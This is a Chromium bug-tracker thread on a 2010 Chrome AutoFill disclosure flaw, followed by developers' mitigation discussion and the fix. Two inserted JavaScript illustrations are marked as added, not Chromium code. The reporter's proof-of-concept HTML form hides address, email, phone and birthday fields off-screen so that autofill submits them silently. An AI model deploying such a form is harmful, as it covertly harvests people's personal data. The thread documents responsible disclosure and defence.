Starred by 8 users
Status: Fixed
Owner:
Closed: Jul 2010
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 2
Type: Bug-Security
M-6

Blocking:
issue 48466

"AutoFill Profiles"-feature information disclosure issue
Reported by florian....@gmail.com, Mar 22 2010
Chrome Version       : 5.0.360.0 (42215)
URLs (if applicable) : http://0x7c.de/form_en.php

During some tests of Chrome's new "AutoFill Profiles" feature for addresses
I discovered a simple way to make the user submit all of his personal
information, although the user might think he just entered and submitted
his first name using the autofill feature for addresses.

For this purpose I crafted an HTML web page containing a simple feedback
form. In this form a user can type in his first name, rate the page and
give some short feedback. If the user begins to enter his real first name
(which is not uncommon), Chrome's autofill feature for addresses comes into
play and suggests autocompleting the user's first name, if the user has saved
some personal information in the "AutoFill Profiles" option. If the user
selects his first name, the field will be filled as expected and the user
can continue to fill in the other input fields of my demo web page. If the
user hits the <SUBMIT> button, the feedback will be posted to the server,
which (in this case) shows the submitted data.

At first this does not seem critical, but the "magic" happens behind
the scenes. The form does not only contain a field for the user's first
name; it also contains fields for his phone number, email, address, etc.
But these fields are hidden using CSS, and thus the user does not see that
they were automatically filled with his personal information.

I think that Chrome should prompt the user *if* and especially *what*
personal data from the "AutoFill Profiles" option were automatically filled
into a web page's form fields, so the user can decide whether he wants to
submit this information or not.

If you want to test my simple PoC, just enter http://0x7c.de/form_en.php

If you have any questions or comments, feel free to contact me.

Best regards,
Florian
 
Labels: Feature-Autofill
Status: Untriaged
Thanks for the report.
CCing skylined to decide about the security implications
Labels: Security SecSeverity-Medium Area-UI UI-Needed
Nice find. It's hard to say what the impact is, as it depends on the user: you can 
argue that when you allow auto-fill, you are basically giving away *all* the 
information you provided to that site (even though this is not immediately visible, 
as in this case). However, you can also argue that because the information is not 
visible, users may not realize they are giving out this information. IMHO, the first 
option would mean sec-severity-none. The second option would be sec-severity-high. 
Marking as medium until we hear an argument for one or the other. cc-ing more 
security people for a second opinion.

It is impossible to determine which parts of a form are clearly visible, as "clearly 
visible" is not clearly defined. That means we cannot detect this and warn the user.

I think we will need to involve the UI people to figure out what we can do to educate 
or warn the user. Maybe the best thing is to replace the webform with some UI we 
control that clearly shows which information the site is asking for and allows the user 
to select which information s/he wants to use from auto-fill, for instance through a 
popup, which is opened when the user chooses to use auto-fill. This can have an 
"always use these values for this site" option, to prevent annoying the user and/or 
training them to click "OK" every time.
cc-ing chris and michal as promised; guys, what is your take on this?
How do other browsers behave here?
It's unclear to me what level of user interaction has to occur before autofill data is 
given to random domain X?
I agree with you -- it is hard to decide which parts of a form are visible due to the
huge amount of HTML/CSS styling "tricks" that could be used. Well, I thought of an
opt-in where the user can enable some sort of "golden bar" that appears if the
"AutoFill Profiles" option comes into play. I think message boxes etc. just annoy
people, as you said. The "golden bar" could inform/educate the user in the first place and
e.g. give an additional option to list the auto-filled personal information.

>How do other browsers behave here?

Firefox and Opera are not affected, but Safari "struggles" with the same problem and
fills out the forms with information taken from the personal virtual business card. I
informed Apple's security team about this issue.
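The "which fields are clearly visible" question raised above is the crux of any browser-side mitigation. As an added illustration (not code from this bug or from Chromium), here is a heuristic visibility check that catches the styling used by the PoC on this page, together with the cases it cannot catch. It runs over a plain description of each field (the values getComputedStyle() and getBoundingClientRect() would report), so the same logic runs outside a browser; the viewport size, the input box sizes and the field list are constructed assumptions.

```javascript
// Added example (not Chromium code): a heuristic that flags form fields a
// visitor is unlikely to see. It takes a plain description of each field
// (what getComputedStyle() and getBoundingClientRect() report) so the same
// logic runs in Node as well as in a page.

// Heuristic only: catches display:none, visibility:hidden, opacity:0,
// zero-size boxes and boxes lying entirely outside the viewport. It does
// NOT catch a field hidden behind an overlay, clipped by an ancestor, moved
// away by a transform, or styled with text the same colour as its
// background, which is why "clearly visible" cannot be decided reliably
// from styles alone.
function isProbablyHidden(field, viewport) {
  const s = field.style;
  if (s.display === 'none' || s.visibility === 'hidden') return true;
  if (Number(s.opacity) === 0) return true;
  const r = field.rect;
  if (r.width <= 1 || r.height <= 1) return true;
  // A box that merely pokes into the viewport counts as visible; only a box
  // wholly outside it is flagged.
  return r.right <= 0 || r.bottom <= 0 ||
         r.left >= viewport.width || r.top >= viewport.height;
}

// Partition a form's fields into the ones the visitor can see and the ones
// an autofill would populate silently.
function auditFields(fields, viewport) {
  const visible = [];
  const hidden = [];
  for (const f of fields) {
    (isProbablyHidden(f, viewport) ? hidden : visible).push(f.name);
  }
  return { visible, hidden };
}

// Browser adapter (assumption: called from a page; not exercised in Node).
function describeField(el) {
  const cs = getComputedStyle(el);
  const r = el.getBoundingClientRect();
  return {
    name: el.name,
    style: { display: cs.display, visibility: cs.visibility, opacity: cs.opacity },
    rect: { left: r.left, top: r.top, right: r.right, bottom: r.bottom,
            width: r.width, height: r.height },
  };
}

// Constructed sample mirroring the PoC form on this page: one visible "name"
// input, the rest pushed out of view with bottom:-100px; left:-100px.
// Layout numbers are assumed (1024x768 viewport, ~400x22px inputs). With
// position:absolute and bottom:-100px the box's top edge lands at
// viewport.height + 100 - height, i.e. entirely below the fold, while
// left:-100px leaves part of it horizontally inside the viewport.
const VIEWPORT = { width: 1024, height: 768 };
function box(left, top, width = 400, height = 22) {
  return { left, top, right: left + width, bottom: top + height, width, height };
}
const shown = { display: 'table-cell', visibility: 'visible', opacity: '1' };
const SAMPLE_FIELDS = [
  { name: 'name',      style: shown, rect: box(120, 60) },
  { name: 'lastname',  style: shown, rect: box(-100, VIEWPORT.height + 78) },
  { name: 'firstname', style: shown, rect: box(-100, VIEWPORT.height + 78) },
  { name: 'email',     style: shown, rect: box(-100, VIEWPORT.height + 78) },
  { name: 'phone',     style: shown, rect: box(-100, VIEWPORT.height + 78) },
  { name: 'address',   style: shown, rect: box(-100, VIEWPORT.height + 78) },
  { name: 'rank',      style: shown, rect: box(120, 90, 30, 22) },
  // A field hidden with display:none instead of off-screen positioning.
  { name: 'tracking',  style: { ...shown, display: 'none' }, rect: box(0, 0, 0, 0) },
];

function auditSample() {
  return auditFields(SAMPLE_FIELDS, VIEWPORT);
}

console.log(auditSample());
```

The audit flags every off-screen row of the sample, but a page can defeat it trivially (an opaque image laid over the inputs, `clip`, a `transform`, or simply a white-on-white box), and any position-based rule also mislabels legitimate forms that scroll. That is the practical reason the thread moves from "refuse to fill hidden fields" towards warning the user in the suggestion popup instead.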
Labels: OS-All
Labels: -Area-Undefined Mstone-X
Comment 8 Deleted
Adding Thomas per Florian's request, in case we decide to limit access to this bug.
Comment 10 by brian@chromium.org, Mar 24 2010
Labels: -UI-Needed
It's probably a good idea to see what Toolbar does in this case. zel probably knows. I 
don't think we need the UI-needed label here. 
Status: Started
Looking into this.
Labels: Restrict-View-SecurityTeam
Hi Florian,

The url testcase http://0x7c.de/form_en.php looks down. If you own the site, can you
please bring it back up and/or attach the form_en.php file used.

Unfortunately I don't have access to the PHP file from here (at home), but I can give 
you some early HTML version (don't be put off, some parts are in German and the 
code is really bad ;)

------8<-----
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
	<title>A short, anonymous survey</title>
</head>
<body>

<center><img src="hello.png" alt=""></center>
<h3>How did you like this web page?</h3>
<form method="post" action="/form.php">
<table>
<!-- The only personal field the visitor actually sees. Typing a first name
     here triggers the "AutoFill Profiles" suggestion. -->
<tr>
   <td>First name:</td>
   <td><input type="text" name="name" size="50"></td>
</tr>
<!-- Every row below is pushed out of the viewport with absolute positioning,
     so the visitor never sees that AutoFill populated these fields too. -->
<tr style="position:absolute; bottom:-100px; left:-100px;">
   <td>Last name:</td>
   <td><input type="text" name="lastname" size="50"></td>
</tr>
<tr style="position:absolute; bottom:-100px; left:-100px;">
   <td>First name:</td>
   <td><input type="text" name="firstname" size="50"></td>
</tr>
<tr style="position:absolute; bottom:-100px; left:-100px;">
   <td>Birthday:</td>
   <td><input type="text" name="birthday" size="50"></td>
</tr>
<tr style="position:absolute; bottom:-100px; left:-100px;">
   <td>My e-mail:</td>
   <td><input type="text" name="email" size="50"></td>
</tr>
<tr style="position:absolute; bottom:-100px; left:-100px;">
   <td>My phone number:</td>
   <td><input type="text" name="phone" size="50"></td>
</tr>
<tr style="position:absolute; bottom:-100px; left:-100px;">
   <td>My mobile number:</td>
   <td><input type="text" name="mobile" size="50"></td>
</tr>
<tr style="position:absolute; bottom:-100px; left:-100px;">
   <td>Address:</td>
   <td><input type="text" name="address" size="50"></td>
</tr>
<tr style="position:absolute; bottom:-100px; left:-100px;">
   <td>Postal code:</td>
   <td><input type="text" name="zip" size="50"></td>
</tr>
<tr style="position:absolute; bottom:-100px; left:-100px;">
   <td>City:</td>
   <td><input type="text" name="city" size="50"></td>
</tr>
<tr style="position:absolute; bottom:-100px; left:-100px;">
   <td>Country:</td>
   <td><input type="text" name="country" size="50"></td>
</tr>
<!-- The visible, harmless-looking part of the survey. -->
<tr>
   <td>Rating:</td>
   <td>
   1<input type="radio" name="rank" value="1">
   2<input type="radio" name="rank" value="2" checked>
   3<input type="radio" name="rank" value="3">
   4<input type="radio" name="rank" value="4">
   5<input type="radio" name="rank" value="5">
   (school grades)
   </td>
</tr>
<tr>
   <td valign="top">Message:</td>
   <td>
   <textarea cols="30" rows="6" name="message">Your
    message...</textarea>
   </td>
</tr>
<tr>
   <td>How did you find out<br>about this web site?</td>
   <td>
   <select size="1" name="learnedof">
   <option value="zeitschrift">Magazine</option>
   <option value="google">Google search (AdWords)</option>
   <option value="online">Online</option>
   <option value="friends">Recommendation from a friend</option>
   <option value="anders">By chance</option>
   </select>
   </td>
</tr>
<tr>
   <td></td>
   <td>
   <input type="submit" value="Submit">
   <input type="reset">
   <input type="hidden" name="sent" value="1">
   </td>
</tr>
</table>
</form>
<!-- Image placed at the same off-screen position as the hidden rows. -->
<img src="aaa.gif" height="120" width="800" alt=""
     style="position:absolute; bottom:-100px; left:-100px;">
</body>
</html>
------8<-----
Thanks a lot Florian for your quick response. I am also working out some more
testcases to analyze our autofill behavior in detail.
form_en.php attached right now...
Attachment: form_en.php (2.8 KB)
Thanks Florian for this bug. I am able to successfully reproduce the problem. As far
as I have seen (still analyzing), we are not autofilling anything until there is an
explicit user interaction in which the user explicitly types something that matches a name
and then selects it from the "Name (Label Name)" drop-down. I do understand that
there can be hidden elements, so an attacker can make all elements hidden except the
name, and then wait for the user to select it from the dropdown. The user will not
notice/think that any other info is being filled in. In fact, there is no reliable
way to detect that.

One solution could be to prompt the user (via a yellow bar) that his information is filled in.
This will add another interaction mechanism. So, the user will be required to first
select something from the dropdown and then say yes to the yellow bar prompt. I think
this may become a burden for the user and defeat the purpose of autofill.

However, there is another solution that I thought of, which is to warn the user by adding
something like "Name (Label Name): Warning! Selecting this will release your personal
information to this website" in the drop-down box itself. This way, the number of user
interactions stays at 1 and we did warn the user before selecting it.

How does this solution sound to everyone? If everyone is fine, I will go ahead with
writing a patch.

Just an FYI, I could not test credit card functionality since it is currently in
development and will be available soon. However, I don't think CC autofill is any
different from address autofill. 
inferno: Please do not make this change.  If anything this information should be added 
to the "Learn more" link on the AutoFill infobar.  This link does not currently exist.
Thanks James for discussing this over phone and letting me know about the upcoming
"Learn more" link option that will include this information. As we talked, please
include the UI leads in this discussion to see if anything could be done to prevent
user from falling prey to this attack.
inferno: Thanks for your feedback and comments about the issue. Well, in my opinion
the yellow/golden bar must not require first selecting the fields that will be filled
out. I thought of a yellow bar (as an opt-out) that informs the user that more than
one field will/was automatically filled out. From there the user has the choice to
view a list of the autofilled data and e.g. undo the autofill. The basic yellow bar
could look like this:

----------------------------------------------------------------------------
Autofill applied on 6 fields out of 9 existing fields. Click (here) to see autofilled
data         |X|
----------------------------------------------------------------------------

If the user clicks on (here), Chrome lists the 6 autofilled fields and the user might
undo it.

Best regards, Florian.
Hi Florian,

Thanks for discussing this in more detail. The "undo the autofill" solution has an issue.
An attacker can steal the data by monitoring the DOM and, as soon as the data is
autofilled, will send it to his/her evil server. We are looking for ways to warn the
user before his/her personal information gets autofilled. Also, please note that the
autofill functionality is not yet complete. If you have any other ideas, please feel
free to share them with us. We will keep you updated on this issue.

Warm Regards,
Inferno
>Attacker can steal the data by monitoring the DOM

Sorry, I missed that... undoing the whole thing afterwards makes no sense.

I followed up your idea about informing/educating the user and played around with
some UI-designs, see attachments (just some ideas...).

1) The classic yellow/golden bar

Just a yellow bar that informs the user. If the user moves the mouse over the 8, a
little "hover" box might appear that shows the 8 field names and the information that
will be filled in. If the user clicks on (Learn more...) he/she will be directed to a
help site that explains the autofill feature in more detail and makes him/her aware of
the information disclosure problem.

2) yellow/golden bar in the autofill-choice-box

My second draft proposal seems to be a little more complicated and might confuse a
user, but I post it anyhow: I thought of a yellow bar in the autofill choice box
itself. The user can choose from different ways to autofill the forms:

a) fill out just the field selected,
b) fill out all fields matching the pre-saved autofill data, and
c) fill out the fields with custom choice.

Well, to me the second solution seems to be a bit complicated. Any comment is
appreciated.

Regards, Florian
Attachments: 02.png (8.7 KB), 01.png (10.8 KB)
Re comment 20: IIRC we already have code to "secretly" fill in a field without the 
DOM changing or JavaScript being able to read it. I think we use it for password auto 
fill; it only gets filled in for real when you submit the form. Not entirely sure 
about this though.

Ideally, I'd like to show the user exactly what is being sent to the site, in other 
words, when autofill takes place, we show the user the values that are being entered. 
I think users will not notice popups, goldbars, etc, if they contain generic 
messages, such as "We will fill in your name and address". But when they see their 
own name and address, as in "We will fill in 'John Smith', 'Beverly hills 90210'", 
they may pay more attention.
Isn't it a little late at that point if we notify the user that we just sent their 
credit card info to a potentially malicious site?
Yes, what I meant is: we should show the user all the information that is being autofilled at some point 
before it gets sent to the site.
That requires the user to verify the information for every autofill, which adds 
another click to the process, not to mention cognitive recognition of the data in 
infobar compared to the forms that are visible in the page.  This is like any infobar 
or message box; the user will eventually instinctively press 'Ok' without reading the 
data.
Update: We're fixing this issue in a few ways.  First we're segregating profile 
filling from credit card filling.  In addition, we're making it so that credit card 
autofill can only be initiated from the credit card # field.  That way a malicious 
site can't trick the user into entering a name field that is actually the 'Name on 
card' field with the other credit card fields hidden.  In the M6 timeline, we plan to 
mock up a new design for the AutoFill dropdown that incorporates right-aligned icons 
(similar to the omnibox) that show the user that profile info and/or credit card info 
will be autofilled if the user completes the AutoFill operation.
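To make the policy in that update concrete, here is an added model of the fill decision (not Chromium code, and not the actual Chromium implementation): profile data and credit-card data are kept apart, and a card fill may only be started from the card-number field, so a "Name" box that is really "Name on card" cannot pull in the hidden card fields. Field types are taken as already inferred; the type names, the sample form and the sample profile/card values are constructed assumptions.

```javascript
// Added example (not Chromium code): a model of the Chrome 6 fill policy
// described above. Profile data and credit-card data are segregated, and a
// credit-card fill can only be started from the card-number field. Field
// types are assumed to be inferred already; the type names are assumptions.

const PROFILE_TYPES = new Set([
  'NAME_FIRST', 'NAME_LAST', 'EMAIL_ADDRESS', 'PHONE_NUMBER',
  'ADDRESS_LINE1', 'ADDRESS_CITY', 'ADDRESS_ZIP', 'ADDRESS_COUNTRY',
]);
const CREDIT_CARD_TYPES = new Set([
  'CREDIT_CARD_NAME', 'CREDIT_CARD_NUMBER',
  'CREDIT_CARD_EXP_MONTH', 'CREDIT_CARD_EXP_YEAR',
]);

// Decide which fields a fill started from `triggerName` may populate.
// Returns { kind, fills: { fieldName: value }, reason }.
function planFill(fields, triggerName, profile, card) {
  const trigger = fields.find((f) => f.name === triggerName);
  if (!trigger) return { kind: 'none', fills: {}, reason: 'unknown trigger field' };

  if (CREDIT_CARD_TYPES.has(trigger.type)) {
    if (trigger.type !== 'CREDIT_CARD_NUMBER') {
      // A "Name" box that is really "Name on card" must not start a card fill.
      return { kind: 'none', fills: {}, reason: 'card fill only from the number field' };
    }
    const fills = {};
    for (const f of fields) {
      if (CREDIT_CARD_TYPES.has(f.type) && f.type in card) fills[f.name] = card[f.type];
    }
    return { kind: 'credit_card', fills, reason: 'started from card number' };
  }

  if (PROFILE_TYPES.has(trigger.type)) {
    const fills = {};
    for (const f of fields) {
      // A profile fill never touches card fields, hidden or not.
      if (PROFILE_TYPES.has(f.type) && f.type in profile) fills[f.name] = profile[f.type];
    }
    return { kind: 'profile', fills, reason: 'started from profile field' };
  }
  return { kind: 'none', fills: {}, reason: 'trigger is not an autofillable field' };
}

// Constructed sample form: the visible "name" box from the PoC, hidden
// profile fields, and a "cardholder" box labelled like a plain name field.
const SAMPLE_FORM = [
  { name: 'name',       type: 'NAME_FIRST' },
  { name: 'lastname',   type: 'NAME_LAST' },
  { name: 'email',      type: 'EMAIL_ADDRESS' },
  { name: 'phone',      type: 'PHONE_NUMBER' },
  { name: 'cardholder', type: 'CREDIT_CARD_NAME' },
  { name: 'cardnumber', type: 'CREDIT_CARD_NUMBER' },
  { name: 'expmonth',   type: 'CREDIT_CARD_EXP_MONTH' },
  { name: 'message',    type: 'UNKNOWN' },
];
// Constructed sample data (the card number is a well-known test number).
const SAMPLE_PROFILE = {
  NAME_FIRST: 'John', NAME_LAST: 'Smith',
  EMAIL_ADDRESS: 'john@example.com', PHONE_NUMBER: '555-0100',
};
const SAMPLE_CARD = {
  CREDIT_CARD_NAME: 'John Smith', CREDIT_CARD_NUMBER: '4111111111111111',
  CREDIT_CARD_EXP_MONTH: '12', CREDIT_CARD_EXP_YEAR: '2030',
};

function demo(triggerName) {
  return planFill(SAMPLE_FORM, triggerName, SAMPLE_PROFILE, SAMPLE_CARD);
}

console.log(demo('name'), demo('cardholder'), demo('cardnumber'));
```

Note what this policy does and does not do: starting from the visible "name" box still fills the hidden lastname, email and phone fields, exactly the disclosure this bug reports. The segregation only keeps card data out of that path; for the remaining profile exposure the thread settles on showing the user, in the dropdown itself, that profile data will be filled, rather than trying to refuse the fill.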
Labels: -Mstone-X Mstone-6
Status: Assigned
James, any updates on this bug ?
Labels: ReleaseBlock-Stable
Blockedon: 48466
 Bug 48466  will be tracking the overall security audit progress for autofill.
 Issue 48591  has been merged into this issue.
Blockedon: -48466
Status: Started
Since this bug is already public, let's try to add this as part of the fix (suggestion from Michal):
-----
The only thing we can do without overly complicating stuff is to
make sure that suggest lists are always shown on top of any other UI
elements, so that the user gets some visual warning. Refusing to
autocomplete when element is partly obscured is probably not very
feasible.
------

RT @lavakumark: Stealing AutoFill Google Chrome(Win)based on Safari bug http://bit.ly/cWUVOG Vid http://youtu.be/1Vc0GMDX52w < any1 confirm?
Status: Fixed
ToT now has CC icons and non-limited width popups.
James, I don't think you fixed comment #36. If you want to handle it in a different bug, can you please file a new security bug. The PoC for this is public, so it will be good to fix it.
As far as I know, the popup is always on top. Have you seen otherwise?
James, I am at the Black Hat conference, so I can't check since my VPN is too slow. Can you please check the PoC in comment #36. I saw the YouTube video (after the PoC link) and I didn't see the popup coming on top.
OK, I checked the PoC in comment #36. The drop-down values came on top when you press enter the first time. Then when you press enter again, it gets selected. I don't see this as an issue since user interaction is required and the user's data is clearly shown on top of the false image. So, let's keep this as fixed.
Verified in 6.0.484.0 (54565).
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: Type-Security
Labels: SecImpacts-None
Batch update: fuzzily determined that this security bug did not affect a stable release.
Cc: agektmr@google.com
Proof-of-concept video of clickjacking:
https://plus.google.com/112675818324417081103/posts/PGFmNinuVmv

I think we should raise severity of this issue.
This is not clickjacking and not a convincing phishing attack at all.
Reasons being
1. Autofill popup shows clearly on top.
2. First entry is your credit card entry followed by a clear credit
card logo image.

We got all these mitigations in when we were auditing AutoFill for Chrome 6.

Cc: bulkne...@gmail.com
Labels: -Restrict-View-SecurityNotify
Lifting view restrictions.
Project Member Comment 52 by bugdroid1@chromium.org, Oct 13 2012
Blocking: -chromium:48466 chromium:48466
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 53 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Feature-Autofill -SecSeverity-Medium -Area-UI -Mstone-6 -Type-Security -SecImpacts-None M-6 Security-Severity-Medium Cr-UI Security-Impact-None Type-Bug-Security Cr-UI-Browser-Autofill
Project Member Comment 54 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Project Member Comment 55 by bugdroid1@chromium.org, Mar 21 2013
Labels: Security_Severity-None
Project Member Comment 56 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-None Security_Impact-None
Project Member Comment 57 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-Medium -Security_Severity-None Security_Severity-Medium
Comment 58 by laforge@google.com, Jul 24 2013
Cc: -jeffreyc@chromium.org
Project Member Comment 59 by sheriffbot@chromium.org, Jun 22 2016
Labels: -ReleaseBlock-Stable
Project Member Comment 60 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 61 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic